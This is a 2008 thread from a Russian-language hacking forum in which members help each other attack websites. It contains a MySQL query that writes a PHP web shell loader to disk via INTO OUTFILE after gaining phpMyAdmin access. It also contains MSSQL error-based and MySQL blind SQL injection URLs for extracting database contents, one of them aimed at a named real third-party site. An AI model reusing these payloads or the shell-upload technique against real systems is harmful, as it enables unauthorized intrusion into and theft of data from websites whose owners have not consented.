ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.07.2008, 05:15
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Есть трабла:
Смог получить доступ к БД, нашел пхпмайадмин, далее пытаюсь залить шелл через запрос. Делаю так:
Код:
CREATE TABLE `123` (`shl` TEXT NOT NULL) TYPE = MYISAM; INSERT INTO `123` ( `shl` ) VALUES ('<?php include("тут_адрес_к_шеллу.php") ?>'); SELECT `shl` FROM `123` INTO OUTFILE ''; DROP TABLE `123`
Но оказывается какой-то запрет. Denied for 'user@localhost' (имя юзера дословно не пишу).
Может кто-нибудь знает в чем может быть трабла? Или запрос неправильный составляю...  |
|
|
16.07.2008, 06:38
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756
Репутация:
1
|
|
Сообщение от NamahS
Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!
Я что в игноре? 
ПОЖАЛУЙСТА!!!! ПОМОГИТЕ!!!!!!!!!!!
хотя бы в ПМ
Последний раз редактировалось NamahS; 16.07.2008 в 06:50..
|
|
|
|
16.07.2008, 08:28
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2USAkid по моему ты задавая вопрос сам ответил на него
Есть трабла:
Denied for 'user@localhost'
для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка  |
|
|
|
16.07.2008, 08:42
|
|
Участник форума
Регистрация: 28.06.2007
Сообщений: 221
Провел на форуме:
836479
Репутация:
135
|
|
Сообщение от NamahS
Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!
У тебя условие:
/?part=npcs&id=1+OR+1=(select+db_name(1))
ошибка генерится в части OR 1=(~запрос~)
при выводе в результате запроса данных типа int или binary ошибка конвертации не генерится, просто не выполняется равенство. При выводе типов int, binary экспериментируй с типом левой части приравнивания (в данном случае замени единичку).
Последний раз редактировалось Светлый; 16.07.2008 в 08:56..
|
|
|
|
16.07.2008, 08:45
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Сообщение от MaSTeR GэN
2USAkid по моему ты задавая вопрос сам ответил на него
для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка Блин... Ладно, поищу альтернативу
|
|
|
|
16.07.2008, 17:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
id=9'+and+1=if((version()=5),1,(select+table_name+ from+information_schema.tables))/*
А почему вдруг не пашет substring() ? И откуда вообще такая конструкция if() ? Хотя работает...
|
|
|
|
16.07.2008, 17:05
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Количество скобок смущает =_=.Кстати,в таком случае только посимвольный перебор спасёт?)
|
|
|
|
16.07.2008, 17:08
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2велимир а где там substring ? )
|
|
|
|
16.07.2008, 17:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Да нет,я вообще говорю,что там не пашет 9'+and+substring(version(),1,1)=5/*
http://www.rauchfrei-info.de/index.php?id=9'+and+1=if((version()=5),1,(select+t able_name+from+information_schema.tables+limit+1,1 ))/*
|
|
|
|
16.07.2008, 18:03
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
?id=10-1 не работает )
and 1=1/* не работает )
либо просто скули нет либо просто фильтрации какая то очень странная
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
